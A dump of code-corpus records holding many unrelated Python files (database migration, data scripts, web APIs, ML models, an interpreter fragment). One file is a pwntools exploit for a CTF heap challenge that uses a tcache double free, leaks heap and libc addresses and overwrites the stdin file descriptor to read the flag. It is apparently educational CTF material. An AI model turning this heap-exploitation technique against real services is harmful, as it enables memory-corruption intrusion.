autoincrement=False, nullable=True))\n op.create_foreign_key('cart_beauty_product_id_fkey', 'cart', 'product', ['beauty_product_id'], ['id'])\n op.alter_column('cart', 'product_id',\n existing_type=sa.INTEGER(),\n nullable=True)\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/ef97ccd20ae6_.py","file_name":"ef97ccd20ae6_.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"34662217","text":"import io\r\nimport numpy as np\r\nfrom pandas.core.frame import DataFrame,Series\r\nimport os,xlrd,xlwt,datetime\r\nimport pandas as pd\r\nimport re\r\nfrom datetime import datetime\r\n\r\n\r\n#about dictfuncmaper ,use zip ,for dict dict \r\n#the data better save in the xml file \r\n#static\r\nidir = os.path.abspath(os.path.dirname(__file__))\r\nbasedir = idir + '\\\\data\\\\'\r\ntodaystr = str(datetime.today()).replace(\"-\",'')[:8]\r\ntodaydetail = datetime.today()\r\n\r\nsrcdir = todaystr +'\\\\'\r\ndestdir ='\\\\format\\\\'\r\nfilename = 'bzdata.csv'\r\nsrcpath = basedir + srcdir + filename \r\ndestpath = idir + destdir \r\n\r\n\r\n#dynamic\r\n\r\ncfgpath = idir + '\\\\config\\\\'\r\n\r\n#Note that filter(function, iterable) is equivalent to the generator expression \r\n#(item for item in iterable if function(item)) if function is not None and (item for item in iterable if item) if function is None.\r\n\r\n\r\ncolheader = [\"Bug ID\",\"Status\",\"Risk Level\",\"Product\",\"Hardware\",\"Component\",\"Limitation Status\",\"Opened\",\"Deadline\",\"Release\",\"Platform Affected\",\"Tip Pointer\",\"Tip Status\"]\r\n#dumpin input with file path ,output with DataFrame\r\ndatadumpin = lambda path = srcpath : DataFrame(pd.read_csv(srcpath,sep= ','),columns=colheader )\r\n#dumpout input with DataFrame,output with csv file\r\ndatadumpout = lambda dataset,filez = 'bzdata.csv',index = False: dataset.to_csv(path =destpath+filez,index = index)\r\ndataputter = lambda dataset,dumpfile='dump.csv' : dataset.to_csv(idir + '\\\\format\\\\'+ dumpfile,index=False)\r\n\r\n\r\n#bootstrap\r\ngetconfig = lambda filename,header= 0: DataFrame(pd.read_csv(cfgpath + filename,header = 0))\r\nHWFrame = getconfig('cfg_hardware.csv')\r\nHWLIST = [ item[0] for item in HWFrame.values ] \r\ntrimbrace = lambda x: x if( x.find('(') == -1) else x[ :x.find('(') - 1 ] \r\nlisttrimbrace = lambda x : [trimbrace(item) for item in x]\r\nstatusmarker = lambda sts : {'Closed':'Closed','Rejected':'VrfORRjt','Verify':'VrfORRjt','Limitation':'Limitation','Fixed':'Fixed','Open':'OpenORWork','Working':'OpenORWork'}.get(sts, None) \r\n \r\nstscolumns = ['All','Closed','VrfORRjt','Limitation','LmtReq','LimTipRew','LmtAppv','Fixed','lmtwithapproved','lmtcandidate','Lev1','Lev2','Lev3','Lev4','Lev5et','Lev6','Lev11','duedAt5','duedAt6dl','duedAt6','dueFixed','dueFixnodl','sdvdued']\r\n \r\n\r\n \r\n\r\nCFGPROJECT = getconfig ('cfg_project.csv')\r\nCFGPROJECT['Project'].astype(str)\r\nCFGFUNCTION = getconfig ('cfg_function.csv')\r\nCFGFUNCTION['Function'].astype(str)\r\n#CFGFUNCTION['Product'] = CFGFUNCTION['Product'].str.split('/')\r\nCFGSTS = getconfig('stscolumns.csv')\r\ncfgmilestone = getconfig('cfg_milestone.csv')\r\ncfgmilestone['SDV_EXIT_DATE'].astype(datetime)\r\ncfgmilestone['SIT_EXIT_DATE'].astype(datetime)\r\n\r\nprojectmax = len(CFGPROJECT)\r\n\r\n#functon with local variavbles\r\n#funcmarker =lambda x : (CFGFUNCTION[CFGFUNCTION['Product'].str.contains('/'+x+'/')] ['Function']).tolist() \r\n#funcmarker =lambda x : ((CFGFUNCTION[CFGFUNCTION['Product'].str.contains('/'+x+'/')] ['Function']).tolist())\r\n\r\nfuncmarker =lambda x : ''.join((CFGFUNCTION[CFGFUNCTION['Product'].str.contains('/'+x+'/')] ['Function']).tolist())\r\n#funcmarker =lambda x : (CFGFUNCTION[pd.notnull(CFGFUNCTION['Product'].__contains__(x))]['Function']) if pd.notnull(CFGFUNCTION['Product'].__contains__(x))== True else 'Unkown'\r\nownermarker = lambda x: ''.join((CFGFUNCTION[CFGFUNCTION['Function'] == x ] ['GMO']).tolist()) if x == x else ''\r\n\r\n#for what class got the dataset\r\nrawdata = datadumpin()\r\nrawdata['BlockRevelent'] = False\r\nrawdata['BlockRevelent'].astype(bool)\r\nrawdata['Opened'].astype(datetime)\r\n#rawdata['Deadline'].fillna()\r\nrawdata['Deadline'].astype(datetime)\r\nrawdata['Hardware'] = rawdata['Hardware'].apply(trimbrace )\r\nrawdata['Platform Affected'] = rawdata['Platform Affected'].str.split(',')\r\nrawdata['Platform Affected'] =rawdata[rawdata['Platform Affected'].notnull()]['Platform Affected'].apply(listtrimbrace)\r\n\r\n","sub_path":"namedef.py","file_name":"namedef.py","file_ext":"py","file_size_in_byte":3869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"617981984","text":"''\nimport pandas as pd\nimport numpy as np\nimport Stats\nfrom sklearn import linear_model\nimport matplotlib.pyplot as plt\n\n\ndf = pd.read_csv(\"data\\Credit-Scoring-Clean.csv\")\ndf = pd.DataFrame(df)\n# print(Stats.describe(ds,'Age'))\n\ncolumn = ['Duration','PresentResidenceTime','CreditAmount',\n 'InstallmentRatePecnt','Age','ExistingCreditsAtBank','CreditStatus1']\n\n\n# print(pd.DataFrame(ds,columns=header))\n\ndata = pd.DataFrame(df,columns = column).as_matrix()\n\nX = data[:, 0:5]\nY = data[:, 5:6]\n\nX_TRAIN,X_TEST = np.split(X,2,axis=0)#横向分割,分成2份\n# print(X_TRAIN)\n# print(X_TEST)\nY_TRAIN,Y_TEST = np.split(Y,2,axis=0)#横向分割,分成2份\n# print(Y_TRAIN)\n# print(Y_TEST)\n\n\n#### 简单神经网络\n#权值初始化,3行1列,取值范围-1到1\nW = (np.random.random([5,1])-0.5)*2\n\n#学习率设置\nlr = 0.11\n#计算迭代次数\nn = 0\n#神经网络输出\nO = 0\n\ndef update():\n global X_TRAIN,Y_TRAIN,W,lr\n O = np.dot(X_TRAIN,W)\n W_C = lr*(X_TRAIN.T.dot(Y_TRAIN-O))/int(X_TRAIN.shape[0])\n W = W + W_C\n\n\nfor _ in range(100):\n update()#更新权值\n n+=1\n print(W)#打印当前权值\n print(n)#打印迭代次数\n O = np.sign(np.dot(X_TRAIN,W))#计算当前输出\n if(O == Y_TRAIN).all(): #如果实际输出等于期望输出,模型收敛,循环结束\n print('Finished')\n print('epoch:',n)\n break\n\n # #正样本\n # x1 = [3,4]\n # y1 = [3,3]\n # #负样本\n # x2 = [1]\n # y2 = [1]\n\n#计算分界线的斜率以及截距\nk = -W[1]/W[2]\nd = -W[0]/W[2]\nprint('k=',k)\nprint('d=',d)\n\nxdata = (0,5)\n\nplt.figure()\nplt.plot(xdata,xdata*k+d,'r')\nplt.scatter(np.dot(X_TEST,W), Y_TEST, c='b')\n# plt.scatter(x2, y2, c='y')\nplt.show()\n","sub_path":"CreditSrcoe.py","file_name":"CreditSrcoe.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"422002142","text":"#!/usr/bin/python\n\n# ---------------- READ ME ---------------------------------------------\n# This Script is Created Only For Practise And Educational Purpose Only\n# This Script Is Created For http://bitforestinfo.blogspot.com\n# This Script is Written By\n#\n#\n##################################################\n######## Please Don't Remove Author Name #########\n############### Thanks ###########################\n##################################################\n#\n#\n__author__='''\n\n######################################################\n By S.S.B Group \n######################################################\n\n Suraj Singh\n Admin\n S.S.B Group\n surajsinghbisht054@gmail.com\n http://bitforestinfo.blogspot.com/\n\n Note: We Feel Proud To Be Indian\n######################################################\n'''\n\nif __name__=='__main__':\n\tfrom Graphics import Tkinter as tk \nelse:\n\tfrom .Graphics import Tkinter as tk \n\n\nclass LineNumberCanvas(tk.Canvas):\n def __init__(self, *args, **kwargs):\n tk.Canvas.__init__(self, *args, **kwargs)\n self.text_widget = None\n self.breakpoints = []\n\n def connect(self,text_widget):\n self.text_widget = text_widget\n\n def re_render(self):\n \"\"\"Re-render the line canvas\"\"\"\n self.delete('all') # To prevent drawing over the previous canvas\n\n temp = self.text_widget.index(\"@0,0\")\n while True :\n dline= self.text_widget.dlineinfo(temp)\n if dline is None: \n break\n y = dline[1]\n x = dline[0]\n linenum = str(temp).split(\".\")[0]\n\n id = self.create_text(2,y,anchor=\"nw\", text=linenum)\n\n if int(linenum) in self.breakpoints: \n x1,y1,x2,y2 = self.bbox(id)\n self.create_oval(x1,y1,x2,y2,fill='red')\n self.tag_raise(id)\n\n temp = self.text_widget.index(\"%s+1line\" % temp)\n\n def get_breakpoint_number(self,event):\n if self.find_withtag('current'):\n i = self.find_withtag('current')[0]\n linenum = int(self.itemcget(i,'text'))\n\n if linenum in self.breakpoints:\n self.breakpoints.remove(linenum)\n else:\n self.breakpoints.append(linenum)\n self.re_render()\n \n \n\nclass LineMain:\n def __init__(self, text):\n self.text = text\n self.master = text.master\n self.mechanise()\n self._set_()\n self.binding_keys()\n\n def mechanise(self):\n self.text.tk.eval('''\n proc widget_interceptor {widget command args} {\n\n set orig_call [uplevel [linsert $args 0 $command]]\n\n if {\n ([lindex $args 0] == \"insert\") ||\n ([lindex $args 0] == \"delete\") ||\n ([lindex $args 0] == \"replace\") ||\n ([lrange $args 0 2] == {mark set insert}) || \n ([lrange $args 0 1] == {xview moveto}) ||\n ([lrange $args 0 1] == {xview scroll}) ||\n ([lrange $args 0 1] == {yview moveto}) ||\n ([lrange $args 0 1] == {yview scroll})} {\n\n event generate $widget <>\n }\n\n #return original command\n return $orig_call\n }\n ''')\n self.text.tk.eval('''\n rename {widget} new\n interp alias {{}} ::{widget} {{}} widget_interceptor {widget} new\n '''.format(widget=str(self.text)))\n return\n\n\n def binding_keys(self):\n for key in ['','',\"<>\",\"\"]:\n self.text.bind(key, self.changed)\n self.linenumbers.bind('',self.linenumbers.get_breakpoint_number)\n return\n\n def changed(self, event):\n self.linenumbers.re_render()\n #print \"render\"\n return\n\n\n def _set_(self):\n self.linenumbers = LineNumberCanvas(self.master, width=30)\n self.linenumbers.connect(self.text)\n self.linenumbers.pack(side=\"left\", fill=\"y\")\n return \n\n\nif __name__ == '__main__':\n root = tk.Tk()\n l=tk.Text(root)\n LineMain(l)\n l.pack()\n root.mainloop()\n","sub_path":"magicstick_tutorial_series_python_2_7_support_only/MagicStick_Editor_Part_14/magicsticklibs/LineNumber.py","file_name":"LineNumber.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"619551607","text":"print(4)\nfrom datetime import datetime\nfrom flask import Flask, json, jsonify, request\n#from flask_cors import CORS\nfrom engine.game.game import Game\n# from flask_json import FlaskJSON, JsonError, json_response, as_json\n# print(1)\ngame = Game(8)\napp = Flask(__name__)\napplication = app\n#CORS(app)\n# print(3)\n\n@app.route(\"/\")\ndef hello():\n # print(2)\n return \"Hello World!\"\n\n@app.route(\"/chessboard\")\ndef chessboard():\n board = game.board\n figures = game.figures\n figs = []\n for (i, arr) in enumerate(board):\n for (j, fig) in enumerate(arr):\n if fig is not None:\n figs.append({\"x\": i, \"y\": j, \"type\": board[i][j].__class__.__name__, \"color\": figures[i, j][2]})\n # print(i, j, board[i][j].__class__.__name__, figures[i, j][2])\n return jsonify(figs)\n\n@app.route(\"/move\", methods = ['POST'])\ndef move():\n\n json_data = request.get_json()\n check = game.move(json_data['to']['x'], json_data['to']['y'], json_data['from']['x'],\n json_data['from']['y'], game.figures)\n print(check)\n return chessboard()\n\n# print(5)\napp.run()","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"365550830","text":"# coding=utf-8\nimport base64\nimport base58\nimport six\n\nfrom .serialization1 import Serializable\n\n__all__ = [\n 'GenericData',\n]\n\n\nclass GenericData(Serializable):\n prefer_base58 = False\n\n def __init__(self, bytes_contents, content_type):\n if six.PY3:\n assert isinstance(bytes_contents, bytes), type(bytes_contents)\n self.bytes_contents = bytes_contents\n self.content_type = content_type\n\n def __repr__(self):\n return 'GenericData(%s, len %s)' % (self.content_type, len(self.bytes_contents))\n\n def params_to_json_dict(self):\n res = {}\n if GenericData.prefer_base58:\n encoded_bytes = base58.b58encode(self.bytes_contents)\n encoded_string = encoded_bytes.decode()\n res['base58'] = encoded_string\n else:\n encoded_bytes = base64.b64encode(self.bytes_contents)\n encoded_string = encoded_bytes.decode()\n res['base64'] = encoded_string\n res['content-type'] = self.content_type\n return res\n\n @classmethod\n def params_from_json_dict(cls, d):\n if 'base64' in d:\n base64s = d.pop('base64')\n\n bytes_contents = base64.b64decode(base64s)\n else:\n base58s = d.pop('base58')\n bytes_contents = base58.b58decode(base58s)\n content_type = d.pop('content-type')\n return dict(content_type=content_type, bytes_contents=bytes_contents)\n","sub_path":"duckietown-world-venv/lib/python3.6/site-packages/duckietown_serialization_ds1/builtin_dt.py","file_name":"builtin_dt.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"424126321","text":"import json\nimport sys\n\nfrom flask import (\n jsonify,\n request,\n make_response\n)\n\nfrom google.oauth2 import id_token\nfrom google.auth.transport import requests\n\n\n# Get Secrets Data\ntry:\n SECRET_DATA = json.loads(open('client_secrets.json', 'r').read())['web']\n CLIENT_ID = SECRET_DATA['client_id']\n CLIENT_SECRET = SECRET_DATA['client_secret']\n\n # Get the redirect uri from the file in the form of '/url'\n CLIENT_REDIRECT = SECRET_DATA['redirect_uris'][0]\n CLIENT_REDIRECT = '/%s' % (CLIENT_REDIRECT.split('/')[-1])\nexcept IOError as ioe:\n print('Error: Please download your \\'client_secrets.json\\' file from your \\'https://console.developers.google.com\\' project')\n print(ioe.pgerror)\n print(ioe.diag.message_detail)\n sys.exit(1)\n\n\ndef Google_Callback():\n user_data = None\n\n try:\n # Check if the POST request is trying to log in\n if 'idtoken' in request.form:\n # Get the token from the POST form\n token = request.form['idtoken']\n\n # Specify the CLIENT_ID of the app that accesses the backend:\n idinfo = id_token.verify_oauth2_token(\n token,\n requests.Request(),\n CLIENT_ID\n )\n\n verified_providers = [\n 'accounts.google.com',\n 'https://accounts.google.com'\n ]\n\n if idinfo['iss'] not in verified_providers:\n raise ValueError('Wrong issuer.')\n\n # ID token is valid.\n # Get the user's Google Account ID from the decoded token.\n userid = idinfo['sub']\n\n # Add the token to the flask session variable\n user_data = {\n 'name': idinfo['name'],\n 'email': idinfo['email'],\n 'picture': idinfo['picture']\n }\n\n except ValueError:\n # Invalid token\n print('Error: Unable to verify the token id')\n\n if user_data:\n user_data_json = json.dumps(user_data)\n else:\n user_data_json = None\n\n return user_data_json\n","sub_path":"google_authentication.py","file_name":"google_authentication.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"130368997","text":"import numpy as np \nfrom keras.models import Sequential\nfrom keras.layers import Dense\nimport matplotlib.pyplot as plt\n\nnum_points = 2000\n\nw_real = [0.3,0.5,0.1]\nb_real = -0.2\n\nx_data = np.random.randn(num_points , 3)\nnoise = np.random.randn(1, num_points) * 0.1\ny_data = np.matmul(w_real,x_data.T) + b_real + noise\ny_data = y_data.reshape(2000,1)\n\nmodel = Sequential()\nmodel.add(Dense(1,input_shape=(3,)))\nmodel.compile(loss = 'mse', optimizer = 'sgd')\nmodel.summary()\n\nhistory = model.fit(x_data,y_data,epochs=1000,verbose=0)\n\nweights, bias = model.layers[0].get_weights()\nprint(weights, bias)\n\nplt.plot(history.history['loss'])\nplt.legend(['train'],loc = 'upper left')\nplt.show()","sub_path":"machine-workspace/Keras/Ex03.py","file_name":"Ex03.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"182800226","text":"\"\"\"\nНаписати функцію, яка випадковим чином вертає число у проміжку від 0 до 100. ( random_100)\nВідповідно Написати функцію (summarizer). Яка містить змінну result=0.\nФункція summarizer викликає функцію random_100 і додає до суми рузультат.\nЯкщо результат більше 100 то надрукуйте результат.\n\"\"\"\nfrom random import randint\n\n\ndef random_100():\n return randint(0, 100)\n\n\ndef summarizer():\n result = 0\n while result < 1000:\n result += random_100()\n return result\n\n\nif __name__ == '__main__':\n print('The random summ higher than 1000 is {}'.format(summarizer()))\n","sub_path":"lesson2/task_functions3.py","file_name":"task_functions3.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"643496067","text":"import os\n\nimport pytest\n\nfrom crux.exceptions import CruxResourceNotFoundError\n\n\n@pytest.mark.usefixtures(\"dataset\", \"helpers\")\ndef test_stream_file(dataset, helpers):\n upload_path = os.path.join(\n os.path.abspath(os.path.dirname(os.path.dirname(__file__))),\n \"data\",\n \"test_file.csv\",\n )\n file_name = \"test_file_\" + helpers.generate_random_string(4) + \".csv\"\n\n file_1 = dataset.upload_file(local_path=upload_path, path=\"/\" + file_name)\n\n assert file_1.name == file_name\n\n stream = file_1.iter_content(decode_unicode=True)\n\n result = \"\"\n\n for chunk in stream:\n result += chunk\n\n assert \"bank\" in result\n assert \"location\" in result\n\n\n@pytest.mark.usefixtures(\"dataset\", \"helpers\")\ndef test_delete_file(dataset, helpers):\n upload_path = os.path.join(\n os.path.abspath(os.path.dirname(os.path.dirname(__file__))),\n \"data\",\n \"test_file.csv\",\n )\n\n file_name = \"test_file_\" + helpers.generate_random_string(4) + \".csv\"\n\n file_1 = dataset.upload_file(local_path=upload_path, path=\"/\" + file_name)\n\n assert file_1.name == file_name\n\n delete_result = file_1.delete()\n\n assert delete_result is True\n\n with pytest.raises(CruxResourceNotFoundError):\n file_1.delete()\n\n\n@pytest.mark.usefixtures(\"dataset\", \"helpers\")\ndef test_upload_file_string(dataset, helpers):\n upload_file_string = os.path.join(\n os.path.abspath(os.path.dirname(os.path.dirname(__file__))),\n \"data\",\n \"test_file.csv\",\n )\n\n file_1 = dataset.create_file(\n \"/test_file_\" + helpers.generate_random_string(4) + \".csv\"\n )\n\n upload_result = file_1.upload(upload_file_string)\n\n assert upload_result is True\n\n\n@pytest.mark.usefixtures(\"dataset\", \"helpers\")\ndef test_upload_file_object(dataset, helpers):\n upload_file_string = os.path.join(\n os.path.abspath(os.path.dirname(os.path.dirname(__file__))),\n \"data\",\n \"test_file.csv\",\n )\n\n file_os_object = open(upload_file_string, \"rb\")\n\n file_1 = dataset.create_file(\n \"/test_file_\" + helpers.generate_random_string(4) + \".csv\"\n )\n\n upload_result = file_1.upload(file_os_object)\n\n assert upload_result is True\n\n file_os_object.close()\n","sub_path":"tests/integration/test_file.py","file_name":"test_file.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"522484407","text":"from django import forms\n\nsex_choices = (\n ('M', 'male'),\n ('F', 'female'),\n ('O', 'other'),\n)\n\neng_lvl = (\n ('A1', 'No knowledge of English'),\n ('A2', 'Elementary level of English'),\n ('B1', 'Low intermediate level of English'),\n ('B2', 'High intermediate level of English'),\n ('C1', 'Advanced level of English'),\n ('C2', 'Proficient in English'),\n)\n\n\nclass NameForm(forms.Form):\n your_name = forms.CharField(label='Your name', max_length=5)\n your_sex = forms.ChoiceField(choices=sex_choices)\n your_age = forms.IntegerField(min_value=0)\n your_eng_lvl = forms.ChoiceField(choices=eng_lvl)\n\n\nclass LoginForm(forms.Form):\n username = forms.CharField(label='uname')\n password = forms.CharField(label='pass')","sub_path":"38/mysite/myapp36/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"301383582","text":"plik = open(\"dane_6_1.txt\")\r\nplik1 = open(\"wyniki_6_1.txt\",\"w\")\r\nplik2 = open(\"dane_6_2.txt\")\r\nplik3 = open(\"wyniki_6_2.txt\",\"w\")\r\nplik3 = open(\"dane_6_3.txt\")\r\nwyrazy = []\r\nwyrazy1, klucze1 = [], []\r\nfor linika in plik:\r\n wyrazy.append(linika)\r\n\r\nfor linika in plik2:\r\n pom1, pom2 = linika.split(\" \")\r\n wyrazy1.append(pom1)\r\n if len(pom2[:-1]) == 0:\r\n klucze1.append(0)\r\n else:\r\n klucze1.append(int(pom2[:-1]))\r\n\r\nslowo1, slowo2 = [], []\r\nfor linika in plik3:\r\n pom1, pom2 = linika.split(\" \")\r\n slowo1.append(pom1)\r\n slowo2.append(pom2[:-1])\r\n\r\ndef szyfrowanie(wyraz, klucz):\r\n wynik = \"\"\r\n for litera in wyraz:\r\n pomoc = ord(litera) - 65\r\n pomoc += klucz%26\r\n if pomoc > 25:\r\n pomoc -= 26\r\n wynik += (chr(pomoc+65)) \r\n return wynik\r\n\r\ndef szyfrowanie2(wyraz, klucz):\r\n wynik = \"\"\r\n for litera in wyraz:\r\n pomoc = ord(litera) - 65\r\n pomoc -= klucz%26\r\n if pomoc < 0:\r\n pomoc += 26\r\n wynik += (chr(pomoc+65)) \r\n return wynik\r\n\r\ndef zad1():\r\n for wyraz in wyrazy:\r\n plik1.write(szyfrowanie(wyraz,107))\r\n \r\ndef zad2():\r\n for i in range(len(wyrazy1)):\r\n pomoc = (szyfrowanie2(wyrazy1[i],klucze1[i]))\r\n plik3.write(pomoc)\r\n plik3.write(\"\\n\")\r\n\r\ndef zad3():\r\n for i in range(len(slowo1)):\r\n wyniki = []\r\n pomoc1 = slowo1[i]\r\n pomoc2 = slowo2[i]\r\n for x in range(len(pomoc1)):\r\n roznica = ord(pomoc1[x]) - ord(pomoc2[x])\r\n if roznica not in wyniki:\r\n wyniki.append(roznica)\r\n if len(wyniki) > 2:\r\n print(pomoc1)\r\n\r\n\r\nzad3()\r\n\r\n\r\n\r\n \r\n\r\n","sub_path":"2016_6.py","file_name":"2016_6.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"316485477","text":"import tensorflow as tf\nfrom model.encoder_decoder import Encoder, Decoder\n\n\nclass Transformer(tf.keras.Model):\n def __init__(self, num_layers, d_model, num_heads, dff, input_vocab_size,\n target_vocab_size, rate=0.1):\n super(Transformer, self).__init__()\n self.encoder = Encoder(num_layers, d_model, num_heads, dff,\n input_vocab_size, rate)\n self.decoder = Decoder(num_layers, d_model, num_heads, dff,\n target_vocab_size, rate)\n self.final_layer = tf.keras.layers.Dense(target_vocab_size)\n\n def call(self, inp, tgt, training, enc_padding_mask,\n look_ahead_mask, dec_padding_mask):\n enc_output = self.encoder(inp, training, enc_padding_mask) # [batch, input_seq_len, d_model]\n\n # dec_output.shape == (batch, tgt_seq_len, d_model)\n dec_output, attention_weights = self.decoder(tgt, enc_output, training,\n look_ahead_mask, dec_padding_mask)\n\n final_output = self.final_layer(dec_output)\n return final_output, attention_weights\n\nif __name__ == \"__main__\":\n print(tf.__version__)\n sample_transformer = Transformer(\n num_layers=2, d_model=512, num_heads=8, dff=2048,\n input_vocab_size=8500, target_vocab_size=8000)\n\n temp_input = tf.random.uniform((64, 62)) # [batch, inp_seq_len]\n temp_target = tf.random.uniform((64, 26)) # [batch, tgt_seq_len]\n\n fn_out, _ = sample_transformer(temp_input, temp_target, training=False,\n enc_padding_mask=None,\n look_ahead_mask=None,\n dec_padding_mask=None)\n\n print(fn_out.shape)","sub_path":"model/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"361683423","text":"#!/usr/bin/env python2\nimport sys,os\nfrom pwn import *\n\ncontext.update(arch=\"amd64\", endian=\"little\", os=\"linux\", )\n\nLOCAL = True\nHOST=\"pwn.game.alcapwnctf.in\"\nPORT=31233\n\nTARGET=os.path.realpath(\"hiv\")\n\n# e = ELF(TARGET, False)\n\ndef create(num, typ):\n r.sendlineafter(\">> \",\"1\")\n r.sendlineafter(\"> \",str(typ))\n r.sendlineafter(\": \", str(num))\n return\n\ndef delete(typ):\n r.sendlineafter(\">> \",\"2\")\n r.sendlineafter(\"> \",str(typ))\n return\n\ndef show(typ):\n r.sendlineafter(\">> \",\"3\")\n r.sendlineafter(\"> \",str(typ))\n return\n\ndef exploit(r):\n # do double free to leak heap base\n create(1,1)\n create(2,2)\n delete(1)\n create(2,2)\n delete(1)\n\n # Leak the heap base\n show(1)\n heaplb = (int(r.recvline().split(\":\")[1])&0xffffffff)-0x260\n log.info(\"Heap lower bytes are {}\".format(hex(heaplb)))\n\n # While keeping the same data in 1st tcache bin, fill the 0th bin\n create(heaplb+0x260, 1)\n delete(2)\n create(heaplb+0x260, 1)\n delete(2)\n\n # Use the corruption in 0th bin to change size of bins in 1st bin\n create(heaplb+0x260-0x10, 2)\n create(2, 2)\n create(0xb1, 2)\n \n # Fill the 1st tcache bin 8 times to put chunk in unsorted bin\n for i in range(7):\n delete(1)\n create(2, 2)\n delete(1)\n \n # Leak the libc base\n show(1)\n libclb = (int(r.recvline().split(\":\")[1])&0xffffffff)-0x3ebca0\n log.info(\"Libc lower bytes are {}\".format(hex(libclb)))\n\n stdin_fd = libclb+0x3eba70\n\n # Overwrite the stdin fd \n create(stdin_fd, 2)\n create(1, 1)\n create(666, 1)\n\n # Trigger scanf to read flag from fd and print it\n r.sendlineafter(\">> \",\"4\")\n r.recvuntil(\":\")\n print(\"FLAG: \" + r.recvline().strip())\n r.recvall()\n r.close()\n return\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) > 1:\n LOCAL = False\n r = remote(HOST, PORT)\n else:\n LOCAL = True\n r = process([TARGET,])\n pause()\n\n exploit(r)\n\n sys.exit(0)\n","sub_path":"pwn/hiv/xploit_hiv.py","file_name":"xploit_hiv.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"190850753","text":"import sys\nimport re\nclass program:\n\tdef __init__(self,phrase):\n\t\tself.comp_stmt=CompoundStmt(phrase)\n\n\tdef eval(self,state):\n\t\tself.comp_stmt.eval(state)\n\n\nclass CompoundStmt:\n\tdef __init__(self,phrase):\n\t\tself.stmts=[]\n\t\tcounter=0\n\t\tj=0\n\t\t#print(phrase)\n\t\tstr2=[]\n\t\tfor x in phrase:\n\t\t\tif x.find(\";\")<0:\n\t\t\t\tx=x+';'\n\t\t\tstr2.append(x)\t\t\t\n\t\tphrase=str2\n\t\t#print(phrase)\n\t\twhile(j=0:\n\t\t\t\tself.k=i.split()\n\t\tf=re.findall(r\"(?<=begin;) (.*?) (?=return)\", str1)\n\t\tprint(f)\n\t\tself.func_part=CompoundStmt(list(filter(None,f[0].split(\";\"))))\n\t\t\n\tdef eval(self,newstate):\n\t\tif self.k[1].isalpha():\n\t\t\treturn newstate(k[1])\n\t\telse:\n\t\t\treturn 0\n\nclass IfelseStmt(Stmt):\n\tdef __init__(self,s):\n\t\tstr1 = ' '.join(s)\n\t\tself.flag=Cond(s[0])\n\t\t\n\t\tIf_part=re.findall(r\"(?<=then;) (.*?) (?=else;)\", str1)\n\t\tself.left=CompoundStmt(list(filter(None,If_part[0].split(\";\"))))\n\t\telse_part=re.findall(r\"(?<=else;) (.*?) (?=fi;)\", str1)\n\t\tself.right=CompoundStmt(list(filter(None,else_part[0].split(\";\"))))\n\t\n\tdef eval(self,state):\n\t\t#print(self.flag.eval(state))\n\t\tif self.flag.eval(state):\n\t\t\tself.left.eval(state)\n\t\telse:\n\t\t\tself.right.eval(state)\n\n\nclass WhileStmt(Stmt):\n\tdef __init__(self,s):\n\t\t\n\t\tstr1 = ' '.join(s)\n\t\t#print(str1)\n\t\tself.flag=Cond(s[0])\n\t\tWhile_part=re.findall(r\"(?<=do;) (.*?) (?=done;)\", str1)\n\t\tself.content=CompoundStmt(list(filter(None, While_part[0].split(\";\"))))\n\t\n\tdef eval(self,state):\n\t\t#print(self.flag.eval(state))\n\t\twhile self.flag.eval(state):\n\t\t\tself.content.eval(state)\n\t\t\nclass parameter(funcStmt):\n\tdef __init__(self,s):\n\t\tself.exps=[]\n\t\tcond=s.split()\n\t\tp1=cond[1].split(\"(\")\n\t\tp2=p1[1].split(\")\")\n\t\tparameters=p2[0].split(\",\")\n\t\tfor i in parameters:\n\t\t\tself.exps+=[Expression.build(i)]\n\tdef eval(self,state):\n\t\ta=[]\n\t\tfor i in self.exps:\n\t\t\ta+=[state[i]]\n\t\treturn a\n\t\n\n\nclass Cond(IfelseStmt):\n\tdef __init__(self,s):\n\t\tself.cond=s.split()\n\n\t\tif self.cond[1].find(\">\") >=0:\n\t\t\texp1,exp2=self.cond[1].split(\">\")\n\t\t\tself.exp1=Expression.build(exp1)\n\t\t\tself.exp2=Expression.build(exp2)\n\t\t\n\t\tif self.cond[1].find(\"<\") >=0:\n\t\t\texp1,exp2=self.cond[1].split(\"<\")\n\t\t\tself.exp1=Expression.build(exp1)\n\t\t\tself.exp2=Expression.build(exp2)\n\t\t\n\t\tif self.cond[1].find(\"==\") 